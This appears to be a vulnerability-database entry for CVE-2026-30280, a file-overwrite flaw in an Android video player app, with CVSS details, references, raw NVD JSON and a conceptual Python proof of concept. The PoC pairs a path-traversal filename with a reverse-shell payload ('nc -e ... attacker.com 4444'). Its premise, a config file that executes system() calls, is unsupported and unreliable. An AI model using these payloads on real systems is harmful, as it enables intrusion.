CVE-2026-30280

Description

An arbitrary file overwrite vulnerability in RAREPROB SOLUTIONS PRIVATE LIMITED Video player Play All Videos v1.0.135 allows attackers to overwrite critical internal files via the file import process, leading to arbtrary code execution or information exposure.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:rareprob:video_player:1.0.135:*:*:*:*:android:*:* - VULNERABLE

Video player Play All Videos 1.0.135

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import os

# PoC Concept for Arbitrary File Overwrite
# This script demonstrates how to craft a file intended to overwrite a critical config.

# Target file path (Path Traversal)
# Assuming the app runs in a sandboxed environment but fails to sanitize paths.
# Example target: shared_prefs or a library file.
malicious_filename = "../../data/data/com.rareprob.playall/files/malicious_config.xml"

# Malicious content to be written
payload = "<config><execute>system('nc -e /bin/sh attacker.com 4444')</execute></config>"

# Simulating the file creation process that would occur before import
print(f"[*] Creating malicious file: {malicious_filename}")
print(f"[*] Payload content prepared: {payload}")

# In a real attack scenario:
# 1. The attacker places this file in a location the app can read (e.g., Downloads).
# 2. The attacker tricks the user into using the 'Import' feature of the app.
# 3. The app reads the filename without sanitization and overwrites the target file.

print("[!] If imported by the vulnerable app, critical files will be overwritten.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-30280
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-30280
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-30280/
[4] VulDB https://vuldb.com/cve/CVE-2026-30280
[5] https://github.com/Secsys-FDU/AF_CVEs/issues/29
[6] https://rareprob-website.firebaseapp.com/
[7] https://secsys.fudan.edu.cn/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-30280", "sourceIdentifier": "[email protected]", "published": "2026-03-31T20:16:26.420", "lastModified": "2026-04-02T20:44:44.690", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in RAREPROB SOLUTIONS PRIVATE LIMITED Video player Play All Videos v1.0.135 allows attackers to overwrite critical internal files via the file import process, leading to arbtrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rareprob:video_player:1.0.135:*:*:*:*:android:*:*", "matchCriteriaId": "A0CA20CD-4D19-4C08-9EDB-A6B44EC34705"}]}]}], "references": [{"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/29", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "Issue Tracking"]}, {"url": "https://rareprob-website.firebaseapp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}